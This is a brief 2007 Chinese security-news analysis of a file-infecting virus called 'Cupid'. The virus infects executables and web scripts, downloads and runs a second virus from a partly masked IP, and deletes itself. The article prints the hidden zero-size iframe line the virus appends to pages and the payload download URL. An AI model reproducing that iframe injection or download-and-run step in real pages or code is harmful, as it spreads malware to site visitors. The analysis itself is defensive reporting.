首席信息官
世界经理人 > 首席信息官 > 信息化动态 > 网络安全
 

 

来去无踪 小心能删除自身的病毒丘比特

首席信息官ICXO.COM ( 日期:2007-07-04 15:15)

其中一个新病毒,毒霸管它叫丘比特,以下是详细分析报告。

该病毒是一个感染型病毒。该病毒会感染后缀为.exe、.scr的可执行文件和.htm、.html、.asp的脚本文件。(李俊太有才了,自熊猫后,越来越多的病毒感染网页格式的文档)

1、将自身拷贝到系统目录下

%SystemRoot%system32love.exe

2、该病毒将urlmon.dll拷贝一份名为ok.dll,加载并调用其导出函数URLDownloadToFileA下载并运行另一病毒,其下载路径为

http://63.223.96.***/zcx.exe

3、在脚本尾加

%iframe src=http://63.223.96.***/ma6.htm width=0 height=0%%/iframe%

4、该病毒运行后会自删除。

来源:赛迪网
作者:李铁军


     精彩视点
 
 木马传播新途径隐藏在视频文件里
 剖析Linux病毒原型工作过程和关键环节
 专家提醒:谨防移动存储设备传播的蠕虫病毒
 3月20日病毒播报:维金和病毒下载器变种
 金山雷军:灰鸽子危害超出熊猫烧香10倍
 网络的核心所在 交换机漏洞五宗罪
 2007年世界顶级杀毒软件排名
 实例讲解密码破解以及抗击手段
 保障电子商务安全的三种技术
 中小企业网络信息安全应对措施分析
领袖职场 赚钱机会! 希望轻松月入1万元以上进来

CIO&CTO推荐

CEO推荐

CFO推荐

CHO推荐

大话IT